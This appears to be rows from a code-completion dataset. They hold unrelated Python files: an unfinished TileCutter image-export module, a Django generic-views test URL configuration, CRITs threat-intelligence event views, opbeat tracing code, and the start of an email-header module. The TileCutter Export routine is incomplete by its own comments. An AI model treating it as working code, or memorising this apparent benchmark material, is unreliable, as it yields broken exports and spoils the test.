gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
# TC Backend functions
# Hack to make PIL work with py2exe
import Image
import PngImagePlugin
import JpegImagePlugin
import GifImagePlugin
import BmpImagePlugin
Image._initialized=2
import wx
import wx.lib.masked as masked
import wx.lib.scrolledpanel as scrolled
import wx.lib.hyperlink as hl
import ImageDraw, ImageWin
import sys, os
import pickle, copy
def Export(self, export_dat=1, export_png=1):
    """Exports the cut png image and dat file.

    Builds one large output image containing every cut tile of the active
    project (frames stacked vertically, views laid out horizontally, with
    optional winter and front-image variants interleaved) and saves it to
    "test.png".

    :param export_dat: nonzero to (eventually) export the .dat file
    :param export_png: nonzero to (eventually) export the .png file
    NOTE(review): export_dat/export_png and the output_* names below are not
    used yet -- the real export path is still unimplemented (see the comment
    block at the end of this function).
    """
    output_png = "test-output.png"
    output_dat = "test-output.dat"
    dat_to_png = "test-output"
    # Firstly find the path from dat file to png
    # Check that both of these are filled out, if png only then
    # don't export the dat file and throw Warning
    # If dat only then export the dat only, and throw Warning
    # If neither, then stop with Error
    p = self.active.info.paksize
    x_dims = self.active.info.xdims
    y_dims = self.active.info.ydims
    z_dims = self.active.info.zdims
    view_dims = self.active.info.views
    winter_dims = self.active.info.winter
    front_dims = self.active.info.frontimage
    frame_dims = len(self.active.frame)
    # Size (in tiles) of one direction's block in the output sheet.
    # BUGFIX: the original referenced undefined names xdims/ydims/zdims.
    unit = (x_dims, y_dims * z_dims)
    width = view_dims * (unit[0] + unit[0] * winter_dims)
    height = frame_dims * (unit[1] + unit[1] * front_dims)
    # Create the PIL image for the output (231,255,255 is the mask colour).
    img = Image.new("RGBA", (width * p, height * p), color=(231, 255, 255, 0))
    # Which image variants exist -- presumably 0=summer, 1=winter,
    # 2=summer-front, 3=winter-front (inferred from the paste-position
    # logic below; confirm against the frame/image data model).
    if winter_dims == 0:
        if front_dims == 0:
            ii = [0]
        else:
            ii = [0, 2]
    else:
        if front_dims == 0:
            ii = [0, 1]
        else:
            ii = [0, 1, 2, 3]
    for f in range(len(self.active.frame)):
        for d in range(self.active.info.views):
            for i in ii:
                # Make a temp image to copy from
                im = self.active.frame[f].direction[d].image[i].image
                # BUGFIX: the original compared a direction *object* with
                # [0,2]; the loop index d is what identifies the view.
                if d in [0, 2]:
                    # Normal dimensions
                    # BUGFIX: the dims are counts, not sequences; the
                    # original wrongly wrapped them in len().
                    xx = x_dims
                    yy = y_dims
                else:
                    # Reverse dimensions (view rotated 90 degrees)
                    xx = y_dims
                    yy = x_dims
                zz = z_dims
                # Expected pixel size of a full diagonal-projection image.
                w = (xx + yy) * (p / 2)
                h = ((xx + yy) * (p / 4)) + (p / 2) + ((zz - 1) * p)
                offset_x = self.active.frame[f].direction[d].image[i].offset_x
                offset_y = self.active.frame[f].direction[d].image[i].offset_y
                abs_off_x = abs(offset_x)
                abs_off_y = abs(offset_y)
                # A negative offset means the source image itself must be
                # shifted inside the temp canvas instead.
                if offset_x < 0:
                    image_offset_x = abs_off_x
                else:
                    image_offset_x = 0
                if offset_y < 0:
                    image_offset_y = abs_off_y
                else:
                    image_offset_y = 0
                # Now create a copy of the input image to use...
                # BUGFIX: the original referenced undefined abs_offx/abs_offy.
                tempimg = Image.new("RGB",
                                    (max([w, im.size[0]]) + abs_off_x,
                                     max([h, im.size[1]]) + abs_off_y),
                                    color=(231, 255, 255, 0))
                # And paste the base image into it at the right spot
                tempimg.paste(im, (image_offset_x, image_offset_y))
                # Now copy from and mask each bit of the image
                for z in range(zz):
                    for x in range(xx):
                        for y in range(yy):
                            # Work out where to paste this particular square
                            if winter_dims == 0:
                                xpos = (d * unit[0]) + x
                            else:
                                # Winter image also
                                if i in [0, 2]:
                                    # Summer column
                                    xpos = (d * unit[0] * 2) + x
                                else:
                                    # Winter column
                                    xpos = (d * unit[0] * 2) + unit[0] + x
                            if front_dims == 0:
                                ypos = (f * unit[1]) + y
                            else:
                                # Front image also
                                if i in [0, 1]:
                                    # Back-image row
                                    ypos = (f * unit[1] * 2) + y
                                else:
                                    # Front-image row
                                    ypos = (f * unit[1] * 2) + unit[1] + y
                            # BUGFIX: the original pasted undefined "tempim".
                            # TODO(review): xpos/ypos are in tile units but
                            # the paste box is in pixels, and no p-by-p source
                            # region is cropped from tempimg -- the cutting/
                            # masking routine below is clearly unfinished.
                            img.paste(tempimg, (xpos, ypos, xpos + p, ypos + p))
                            # Masking routine goes here...
    img.save("test.png")
    # Make image to take outputs from
    # If exporting png:
    # Frames are primary vertical, then direction horizontally,
    # followed by front/back vertically and summer/winter horizontally
    # Then the individual cut images
    # Even if not exporting png:
    # For each one paste into a temporary proto-dat file the image
    # array information
    # If exporting dat:
    # Write out all the necessary file data
def ExportSmoke(self):
    """Exports a smoke object.

    NOTE(review): not implemented yet -- the body is only this docstring,
    so calling it is a no-op returning None.
    """
def ExportCursor(self):
    """Exports the cursor/icon for a building.

    NOTE(review): not implemented yet -- the body is only this docstring,
    so calling it is a no-op returning None.
    """
class tc:
    """This class contains all the core TileCutter functionality, image manipulation,
    exporting, masking etc."""
    # Load some image resources (icons etc.)
    class ImRes:
        """Loads the GUI icon bitmaps, applying the standard mask colour.

        The original implementation repeated the same three-line
        load/mask/convert sequence for every icon; the loading is now
        table-driven.  The resulting attribute set is unchanged.
        """

        # RGB colour treated as transparent throughout the icon set.
        MASK_COLOUR = (231, 255, 255)

        def _load_masked(self, path):
            """Load *path* as a wx.Image with the mask colour applied."""
            im = wx.Image(path)
            im.SetMaskFromImage(im, *self.MASK_COLOUR)
            return im

        def __init__(self):
            # Icons that keep both the wx.Image (as "<name>_im") and the
            # converted bitmap (as "<name>").
            for name, fname in [
                ("summer", "summer-icon.png"),
                ("winter", "winter-icon.png"),
                ("front", "frontimage-icon.png"),
                ("back", "backimage-icon.png"),
                ("north", "north-icon.png"),
                ("east", "east-icon.png"),
                ("south", "south-icon.png"),
                ("west", "west-icon.png"),
                ("reload", "reloadfile-icon.png"),
                ("sameforall", "sameforall-icon.png"),
                ("center", "center-icon.png"),
            ]:
                im = self._load_masked("icons/" + fname)
                setattr(self, name + "_im", im)
                setattr(self, name, im.ConvertToBitmap())
            # Arrow icons: only the bitmap is kept.  The original code
            # reused the throwaway attribute "x" for the intermediate
            # image; keep that attribute for backward compatibility.
            for name, fname in [
                ("up", "up-icon.png"),
                ("up2", "up2-icon.png"),
                ("down", "down-icon.png"),
                ("down2", "down2-icon.png"),
                ("left", "left-icon.png"),
                ("left2", "left2-icon.png"),
                ("right", "right-icon.png"),
                ("right2", "right2-icon.png"),
                ("upright", "up-right-icon.png"),
                ("downright", "down-right-icon.png"),
                ("upleft", "up-left-icon.png"),
                ("downleft", "down-left-icon.png"),
            ]:
                self.x = self._load_masked("icons/" + fname)
                setattr(self, name, self.x.ConvertToBitmap())
| |
from django.conf.urls.defaults import *
from django.views.generic import TemplateView
import views
urlpatterns = patterns('',
# base
#(r'^about/login-required/$',
# views.DecoratedAboutView()),
# TemplateView
(r'^template/simple/(?P<foo>\w+)/$',
TemplateView.as_view(template_name='generic_views/about.html')),
(r'^template/custom/(?P<foo>\w+)/$',
views.CustomTemplateView.as_view(template_name='generic_views/about.html')),
# DetailView
(r'^detail/obj/$',
views.ObjectDetail.as_view()),
url(r'^detail/artist/(?P<pk>\d+)/$',
views.ArtistDetail.as_view(),
name="artist_detail"),
url(r'^detail/author/(?P<pk>\d+)/$',
views.AuthorDetail.as_view(),
name="author_detail"),
(r'^detail/author/byslug/(?P<slug>[\w-]+)/$',
views.AuthorDetail.as_view()),
(r'^detail/author/(?P<pk>\d+)/template_name_suffix/$',
views.AuthorDetail.as_view(template_name_suffix='_view')),
(r'^detail/author/(?P<pk>\d+)/template_name/$',
views.AuthorDetail.as_view(template_name='generic_views/about.html')),
(r'^detail/author/(?P<pk>\d+)/context_object_name/$',
views.AuthorDetail.as_view(context_object_name='thingy')),
(r'^detail/author/(?P<pk>\d+)/dupe_context_object_name/$',
views.AuthorDetail.as_view(context_object_name='object')),
(r'^detail/page/(?P<pk>\d+)/field/$',
views.PageDetail.as_view()),
(r'^detail/author/invalid/url/$',
views.AuthorDetail.as_view()),
(r'^detail/author/invalid/qs/$',
views.AuthorDetail.as_view(queryset=None)),
# Create/UpdateView
(r'^edit/artists/create/$',
views.ArtistCreate.as_view()),
(r'^edit/artists/(?P<pk>\d+)/update/$',
views.ArtistUpdate.as_view()),
(r'^edit/authors/create/naive/$',
views.NaiveAuthorCreate.as_view()),
(r'^edit/authors/create/redirect/$',
views.NaiveAuthorCreate.as_view(success_url='/edit/authors/create/')),
(r'^edit/authors/create/interpolate_redirect/$',
views.NaiveAuthorCreate.as_view(success_url='/edit/author/%(id)d/update/')),
(r'^edit/authors/create/restricted/$',
views.AuthorCreateRestricted.as_view()),
(r'^edit/authors/create/$',
views.AuthorCreate.as_view()),
(r'^edit/authors/create/special/$',
views.SpecializedAuthorCreate.as_view()),
(r'^edit/author/(?P<pk>\d+)/update/naive/$',
views.NaiveAuthorUpdate.as_view()),
(r'^edit/author/(?P<pk>\d+)/update/redirect/$',
views.NaiveAuthorUpdate.as_view(success_url='/edit/authors/create/')),
(r'^edit/author/(?P<pk>\d+)/update/interpolate_redirect/$',
views.NaiveAuthorUpdate.as_view(success_url='/edit/author/%(id)d/update/')),
(r'^edit/author/(?P<pk>\d+)/update/$',
views.AuthorUpdate.as_view()),
(r'^edit/author/(?P<pk>\d+)/update/special/$',
views.SpecializedAuthorUpdate.as_view()),
(r'^edit/author/(?P<pk>\d+)/delete/naive/$',
views.NaiveAuthorDelete.as_view()),
(r'^edit/author/(?P<pk>\d+)/delete/redirect/$',
views.NaiveAuthorDelete.as_view(success_url='/edit/authors/create/')),
(r'^edit/author/(?P<pk>\d+)/delete/$',
views.AuthorDelete.as_view()),
(r'^edit/author/(?P<pk>\d+)/delete/special/$',
views.SpecializedAuthorDelete.as_view()),
# ArchiveIndexView
(r'^dates/books/$',
views.BookArchive.as_view()),
(r'^dates/books/context_object_name/$',
views.BookArchive.as_view(context_object_name='thingies')),
(r'^dates/books/allow_empty/$',
views.BookArchive.as_view(allow_empty=True)),
(r'^dates/books/template_name/$',
views.BookArchive.as_view(template_name='generic_views/list.html')),
(r'^dates/books/template_name_suffix/$',
views.BookArchive.as_view(template_name_suffix='_detail')),
(r'^dates/books/invalid/$',
views.BookArchive.as_view(queryset=None)),
(r'^dates/books/paginated/$',
views.BookArchive.as_view(paginate_by=10)),
# ListView
(r'^list/dict/$',
views.DictList.as_view()),
(r'^list/dict/paginated/$',
views.DictList.as_view(paginate_by=1)),
url(r'^list/artists/$',
views.ArtistList.as_view(),
name="artists_list"),
url(r'^list/authors/$',
views.AuthorList.as_view(),
name="authors_list"),
(r'^list/authors/paginated/$',
views.AuthorList.as_view(paginate_by=30)),
(r'^list/authors/paginated/(?P<page>\d+)/$',
views.AuthorList.as_view(paginate_by=30)),
(r'^list/authors/notempty/$',
views.AuthorList.as_view(allow_empty=False)),
(r'^list/authors/template_name/$',
views.AuthorList.as_view(template_name='generic_views/list.html')),
(r'^list/authors/template_name_suffix/$',
views.AuthorList.as_view(template_name_suffix='_objects')),
(r'^list/authors/context_object_name/$',
views.AuthorList.as_view(context_object_name='author_list')),
(r'^list/authors/dupe_context_object_name/$',
views.AuthorList.as_view(context_object_name='object_list')),
(r'^list/authors/invalid/$',
views.AuthorList.as_view(queryset=None)),
(r'^list/authors/paginated/custom_class/$',
views.AuthorList.as_view(paginate_by=5, paginator_class=views.CustomPaginator)),
(r'^list/authors/paginated/custom_constructor/$',
views.AuthorListCustomPaginator.as_view()),
# YearArchiveView
# Mixing keyword and positional captures below is intentional; the views
# ought to be able to accept either.
(r'^dates/books/(?P<year>\d{4})/$',
views.BookYearArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/make_object_list/$',
views.BookYearArchive.as_view(make_object_list=True)),
(r'^dates/books/(?P<year>\d{4})/allow_empty/$',
views.BookYearArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/allow_future/$',
views.BookYearArchive.as_view(allow_future=True)),
(r'^dates/books/no_year/$',
views.BookYearArchive.as_view()),
# MonthArchiveView
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/$',
views.BookMonthArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>\d{1,2})/$',
views.BookMonthArchive.as_view(month_format='%m')),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/allow_empty/$',
views.BookMonthArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/allow_future/$',
views.BookMonthArchive.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/no_month/$',
views.BookMonthArchive.as_view()),
# WeekArchiveView
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/$',
views.BookWeekArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/allow_empty/$',
views.BookWeekArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/allow_future/$',
views.BookWeekArchive.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/week/no_week/$',
views.BookWeekArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/monday/$',
views.BookWeekArchive.as_view(week_format='%W')),
# DayArchiveView
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/$',
views.BookDayArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/$',
views.BookDayArchive.as_view(month_format='%m')),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/allow_empty/$',
views.BookDayArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/allow_future/$',
views.BookDayArchive.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/no_day/$',
views.BookDayArchive.as_view()),
# TodayArchiveView
(r'dates/books/today/$',
views.BookTodayArchive.as_view()),
(r'dates/books/today/allow_empty/$',
views.BookTodayArchive.as_view(allow_empty=True)),
# DateDetailView
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/(?P<pk>\d+)/$',
views.BookDetail.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<pk>\d+)/$',
views.BookDetail.as_view(month_format='%m')),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/(?P<pk>\d+)/allow_future/$',
views.BookDetail.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/nopk/$',
views.BookDetail.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/byslug/(?P<slug>[\w-]+)/$',
views.BookDetail.as_view()),
# Useful for testing redirects
(r'^accounts/login/$', 'django.contrib.auth.views.login')
)
| |
import json
import urllib
from django import forms
from django.contrib.auth.decorators import user_passes_test
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from crits.core import form_consts
from crits.core.user_tools import user_can_view_data, user_is_admin
from crits.events.forms import EventForm
from crits.events.handlers import event_remove
from crits.events.handlers import update_event_title, update_event_type
from crits.events.handlers import get_event_details
from crits.events.handlers import generate_event_jtable, add_sample_for_event
from crits.events.handlers import generate_event_csv, add_new_event
from crits.samples.forms import UploadFileForm
from crits.vocabulary.events import EventTypes
@user_passes_test(user_can_view_data)
def events_listing(request, option=None):
    """
    Generate Event Listing template.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :param option: Whether or not we should generate a CSV (yes if option is "csv")
    :type option: str
    :returns: :class:`django.http.HttpResponse`
    """
    # CSV download is the special case; everything else goes to the jtable.
    if option != "csv":
        return generate_event_jtable(request, option)
    return generate_event_csv(request)
@user_passes_test(user_can_view_data)
def add_event(request):
    """
    Add an event to CRITs. Should be an AJAX POST.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :returns: :class:`django.http.HttpResponse`
    """
    # Guard clause: anything other than an AJAX POST gets an error page.
    if request.method != "POST" or not request.is_ajax():
        return render_to_response("error.html",
                                  {"error": "Expected AJAX POST"},
                                  RequestContext(request))
    event_form = EventForm(request.user, request.POST)
    if not event_form.is_valid():
        # Return the form with validation messages for re-rendering.
        return HttpResponse(json.dumps({'form': event_form.as_table(),
                                        'success': False}),
                            content_type="application/json")
    data = event_form.cleaned_data
    result = add_new_event(title=data['title'],
                           description=data['description'],
                           event_type=data['event_type'],
                           source=data['source'],
                           method=data['method'],
                           reference=data['reference'],
                           date=data['occurrence_date'],
                           bucket_list=data[form_consts.Common.BUCKET_LIST_VARIABLE_NAME],
                           ticket=data[form_consts.Common.TICKET_VARIABLE_NAME],
                           analyst=request.user.username)
    # The handler may attach the created object; it is not JSON-serializable.
    result.pop('object', None)
    return HttpResponse(json.dumps(result), content_type="application/json")
@user_passes_test(user_can_view_data)
def event_search(request):
    """
    Search for events.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :returns: :class:`django.http.HttpResponseRedirect`
    """
    field = request.GET.get('search_type', '')
    term = request.GET.get('q', '').strip()
    # Redirect to the listing view with the search folded into the query string.
    listing_url = reverse('crits.events.views.events_listing')
    return HttpResponseRedirect("%s?%s" % (listing_url,
                                           urllib.urlencode({field: term})))
@user_passes_test(user_can_view_data)
def view_event(request, eventid):
    """
    View an Event.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :param eventid: The ObjectId of the event to get details for.
    :type eventid: str
    :returns: :class:`django.http.HttpResponse`
    """
    username = request.user.username
    (new_template, args) = get_event_details(eventid, username)
    # The handler may override the default detail template.
    template = new_template if new_template else 'event_detail.html'
    return render_to_response(template, args, RequestContext(request))
@user_passes_test(user_can_view_data)
def upload_sample(request, event_id):
    """
    Upload a sample to associate with this event.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :param event_id: The ObjectId of the event to associate with this sample.
    :type event_id: str
    :returns: :class:`django.http.HttpResponse`, :class:`django.http.HttpResponse`
    """
    # Non-POST requests are bounced back to the event detail page.
    if request.method != 'POST':  # and request.is_ajax():
        return HttpResponseRedirect(reverse('crits.events.views.view_event',
                                            args=[event_id]))
    form = UploadFileForm(request.user, request.POST, request.FILES)
    if not form.is_valid():
        form.fields['related_md5'].widget = forms.HiddenInput() #hide field so it doesn't reappear
        payload = json.dumps({'success': False,
                              'form': form.as_table()})
        return render_to_response('file_upload_response.html',
                                  {'response': payload},
                                  RequestContext(request))
    # Only notify by email when the user ticked the box on the form.
    email = request.user.email if request.POST.get('email') else None
    result = add_sample_for_event(event_id,
                                  form.cleaned_data,
                                  request.user.username,
                                  request.FILES.get('filedata', None),
                                  request.POST.get('filename', None),
                                  request.POST.get('md5', None),
                                  email,
                                  form.cleaned_data['inherit_sources'])
    if result['success']:
        result['redirect_url'] = reverse('crits.events.views.view_event',
                                         args=[event_id])
    return render_to_response('file_upload_response.html',
                              {'response': json.dumps(result)},
                              RequestContext(request))
@user_passes_test(user_is_admin)
def remove_event(request, _id):
    """
    Remove an Event.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :param _id: The ObjectId of the event to remove.
    :type _id: str
    :returns: :class:`django.http.HttpResponse`, :class:`django.http.HttpResponse`
    """
    result = event_remove(_id, '%s' % request.user.username)
    if not result['success']:
        return render_to_response('error.html',
                                  {'error': result['message']},
                                  RequestContext(request))
    # On success send the user back to the listing.
    return HttpResponseRedirect(reverse('crits.events.views.events_listing'))
@user_passes_test(user_can_view_data)
def set_event_title(request, event_id):
    """
    Set event title. Should be an AJAX POST.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :param event_id: The ObjectId of the event to update.
    :type event_id: str
    :returns: :class:`django.http.HttpResponse`
    """
    if request.method != 'POST':
        return render_to_response("error.html",
                                  {"error": "Expected POST"},
                                  RequestContext(request))
    result = update_event_title(event_id,
                                request.POST.get('title', None),
                                request.user.username)
    return HttpResponse(json.dumps(result), content_type="application/json")
@user_passes_test(user_can_view_data)
def set_event_type(request, event_id):
    """
    Set event type. Should be an AJAX POST.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :param event_id: The ObjectId of the event to update.
    :type event_id: str
    :returns: :class:`django.http.HttpResponse`
    """
    if request.method != 'POST':
        return render_to_response("error.html",
                                  {"error": "Expected POST"},
                                  RequestContext(request))
    result = update_event_type(event_id,
                               request.POST.get('type', None),
                               request.user.username)
    return HttpResponse(json.dumps(result), content_type="application/json")
@user_passes_test(user_can_view_data)
def get_event_type_dropdown(request):
    """
    Get a list of available event types.

    :param request: Django request object (Required)
    :type request: :class:`django.http.HttpRequest`
    :returns: :class:`django.http.HttpResponse`
    """
    if not request.is_ajax():
        return render_to_response("error.html",
                                  {"error": "Expected AJAX"},
                                  RequestContext(request))
    payload = {'types': EventTypes.values(sort=True)}
    return HttpResponse(json.dumps(payload),
                        content_type="application/json")
| |
import functools
import logging
import threading
import time
from datetime import datetime
from collections import defaultdict
from opbeat.utils import get_name_from_func
from opbeat.utils.encoding import force_text
from opbeat.utils.lru import LRUCache
error_logger = logging.getLogger('opbeat.errors')
all = ('trace', )
thread_local = threading.local()
thread_local.transaction_traces = []
thread_local.transaction = None
def get_transaction():
    """
    Get the transaction registered for the current thread.

    :return: the thread-bound transaction, or None when none was started
    :rtype: Transaction
    """
    transaction = getattr(thread_local, "transaction", None)
    return transaction
class Transaction(object):
    """One request/operation being traced; owns a stack of open traces."""

    # Shared cache of trace fingerprints whose stack frames were already
    # collected, so the (expensive) frame capture runs once per unique trace.
    _lrucache = LRUCache(maxsize=5000)

    def __init__(self, start_time, get_frames, client,
                 kind="transaction.django"):
        # start_time: epoch seconds at which the transaction began.
        # get_frames: callable returning the current stack frames.
        self.start_time = start_time
        self.get_frames = get_frames
        self.client = client
        # Finished traces, collected by end_trace().
        self.transaction_traces = []
        # Stack of currently-open traces (innermost last).
        self.trace_stack = []
        # When True (set by a leaf trace), nested begin_trace() calls only
        # push placeholders instead of real traces.
        self.ignore_subtree = False
        # The transaction is a trace as well
        self.begin_trace("transaction", "transaction")

    def end_transaction(self, skip_frames=8):
        # End the "transaction" trace started above
        return self.end_trace(skip_frames)

    def begin_trace(self, signature, kind, extra=None, leaf=False):
        # If we were already called with `leaf=True`, we'll just push
        # a placeholder on the stack.
        if self.ignore_subtree:
            self.trace_stack.append(None)
            return None
        if leaf:
            self.ignore_subtree = True
        abs_start = time.time()
        trace = Trace(signature, kind, abs_start, extra)
        self.trace_stack.append(trace)
        return trace

    def end_trace(self, skip_frames):
        trace = self.trace_stack.pop()
        if trace is None:
            # Placeholder pushed while inside a leaf trace: nothing to close.
            return None
        # Closing any real trace re-enables tracing of subsequent siblings.
        self.ignore_subtree = False
        # Duration in milliseconds.
        duration = (time.time() - trace.abs_start_time)*1000
        if self.trace_stack:
            parent_start_time = self.trace_stack[-1].abs_start_time
        else:
            # NOTE(review): with an empty stack this makes rel_start_time an
            # absolute epoch offset in ms -- presumably only reached for the
            # root "transaction" trace; confirm against the intake format.
            parent_start_time = 0.0
        rel_start_time = (trace.abs_start_time - parent_start_time) * 1000
        # The enclosing open traces form this trace's parent chain.
        parents = [s.signature for s in self.trace_stack]
        trace.parents = tuple(parents)
        trace.trace_duration = duration
        trace.rel_start_time = rel_start_time
        # Capture stack frames only the first time a fingerprint is seen.
        if not self._lrucache.has_key(trace.fingerprint):
            self._lrucache.set(trace.fingerprint)
            frames = self.get_frames()[skip_frames:]
            trace.frames = frames
        self.transaction_traces.append(trace)
        return trace
class AbstractTrace(object):
    """State shared by Trace and TraceGroup."""

    def __init__(self, signature, kind, extra):
        # Attributes filled in later, once the owning transaction is known.
        self.transaction = None
        self.transaction_duration = None
        self.parents = None
        self.frames = None
        # Identity of the traced operation.
        self.signature = signature
        self.kind = kind
        self.extra = extra

    @property
    def fingerprint(self):
        """Grouping key: equal fingerprints are aggregated together."""
        return (self.transaction, self.parents, self.signature, self.kind)
class Trace(AbstractTrace):
    """A single timed span recorded within one transaction."""

    def __init__(self, signature, kind, abs_start_time, extra=None, leaf=False):
        super(Trace, self).__init__(signature, kind, extra)
        self.abs_start_time = abs_start_time
        self.leaf = leaf
        # Both are filled in by Transaction.end_trace().
        self.trace_duration = None
        self.rel_start_time = None
class TraceGroup(AbstractTrace):
    """Aggregates traces sharing a fingerprint across transactions."""

    def __init__(self, trace):
        # The first trace seen supplies all the group-level metadata.
        super(TraceGroup, self).__init__(trace.signature, trace.kind, trace.extra)
        self.parents = trace.parents
        self.frames = trace.frames
        self.transaction = trace.transaction
        self.traces = []

    def add(self, trace):
        """Record one more trace belonging to this group."""
        self.traces.append(trace)

    def _decode(self, param):
        # Best effort: substitute a placeholder for undecodable input.
        try:
            return force_text(param, strings_only=True)
        except UnicodeDecodeError:
            return '(encoded string)'

    def as_dict(self):
        """Serialize the group for submission."""
        # Merge frames into extra
        extra = dict(self.extra or {})
        if self.frames:
            extra['_frames'] = self.frames
        durations = [(t.trace_duration, t.transaction_duration)
                     for t in self.traces]
        return {
            "transaction": self.transaction,
            "durations": durations,
            "signature": self.signature,
            "kind": self.kind,
            "parents": self.parents,
            "extra": extra,
            "start_time": min(t.rel_start_time for t in self.traces),
        }
class _RequestGroup(object):
def __init__(self, transaction, response_code, minute):
self.transaction = transaction
self.response_code = response_code
self.minute = minute
self.durations = []
@property
def fingerprint(self):
return self.transaction, self.response_code, self.minute
def add(self, elapsed):
self.durations.append(elapsed)
def as_dict(self):
return {
"transaction": self.transaction,
"result": self.response_code,
"timestamp": datetime.utcfromtimestamp(self.minute).isoformat() + "Z",
"durations": self.durations
}
class RequestsStore(object):
    """Thread-safe accumulator of finished transactions and trace groups,
    drained periodically (see get_all / should_collect) by a sender."""

    def __init__(self, get_frames, collect_frequency):
        # Condition guards _transactions/_traces and wakes blocked get_all().
        self.cond = threading.Condition()
        self._get_frames = get_frames
        # fingerprint -> _RequestGroup
        self._transactions = {}
        # fingerprint -> TraceGroup
        self._traces = defaultdict(list)
        # Minimum seconds between collections (see should_collect).
        self.collect_frequency = collect_frequency
        self._last_collect = time.time()

    def _add_transaction(self, elapsed, transaction, response_code):
        # Bucket the request by (name, status, start of current minute).
        with self.cond:
            requestgroup = _RequestGroup(transaction, response_code,
                                         int(time.time()/60)*60)
            if requestgroup.fingerprint not in self._transactions:
                self._transactions[requestgroup.fingerprint] = requestgroup
            self._transactions[requestgroup.fingerprint].add(elapsed)
            # Wake any get_all(blocking=True) waiter.
            self.cond.notify()

    def get_all(self, blocking=False):
        """Drain and return (transactions, traces) as serializable dicts."""
        with self.cond:
            # If blocking is true, always return at least 1 item
            while blocking and len(self._traces) == 0:
                self.cond.wait()
            transactions, self._transactions = self._transactions, {}
            # NOTE(review): this replaces the defaultdict with a plain dict;
            # harmless as written because _add_traces never uses the default
            # factory, but confirm before relying on it elsewhere.
            traces, self._traces = self._traces, {}
            self._last_collect = time.time()
            return ([v.as_dict() for v in transactions.values()],
                    [v.as_dict() for v in traces.values()],)

    def should_collect(self):
        # True once collect_frequency seconds have passed since the last drain.
        return (time.time() - self._last_collect) >= self.collect_frequency

    def __len__(self):
        # Number of buffered request durations (not groups).
        with self.cond:
            return sum([len(v.durations) for v in self._transactions.values()])

    def transaction_start(self, client, kind):
        """
        Start a new transaction and bind it in a thread-local variable
        """
        thread_local.transaction = Transaction(
            time.time(),
            self._get_frames,
            client,
            kind,
        )

    def _add_traces(self, traces):
        # Merge a finished transaction's traces into the fingerprint groups.
        with self.cond:
            for trace in traces:
                if trace.fingerprint not in self._traces:
                    self._traces[trace.fingerprint] = TraceGroup(trace)
                self._traces[trace.fingerprint].add(trace)
            self.cond.notify()

    def transaction_end(self, response_code, transaction_name):
        transaction = get_transaction()
        if transaction:
            # Total wall-clock time in milliseconds.
            elapsed = (time.time() - transaction.start_time)*1000
            transaction.end_transaction()
            transaction_traces = transaction.transaction_traces
            # Take all the traces accumulated during the transaction,
            # set the transaction name on them and merge them into the dict
            for trace in transaction_traces:
                trace.transaction = transaction_name
                trace.transaction_duration = elapsed
            self._add_traces(transaction_traces)
            self._add_transaction(elapsed, transaction_name,
                                  response_code)
        # Reset thread local transaction so a subsequent call to this method
        # behaves as expected.
        thread_local.transaction = None
class trace(object):
    """Decorator / context manager that records a trace around a code section
    when a transaction is active on the current thread (no-op otherwise)."""

    def __init__(self, signature=None, kind='code.custom', extra=None,
                 skip_frames=0, leaf=False):
        self.signature = signature
        self.kind = kind
        self.extra = extra
        self.skip_frames = skip_frames
        self.leaf = leaf
        self.transaction = None

    def __call__(self, func):
        # Fall back to a signature derived from the wrapped callable.
        self.signature = self.signature or get_name_from_func(func)

        @functools.wraps(func)
        def decorated(*args, **kwds):
            with self:
                return func(*args, **kwds)

        return decorated

    def __enter__(self):
        self.transaction = get_transaction()
        if self.transaction:
            self.transaction.begin_trace(self.signature, self.kind, self.extra,
                                         self.leaf)

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self.transaction:
            self.transaction.end_trace(self.skip_frames)
| |
# Copyright (C) 2002-2007 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: email-sig@python.org
"""Header encoding and decoding functionality."""
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
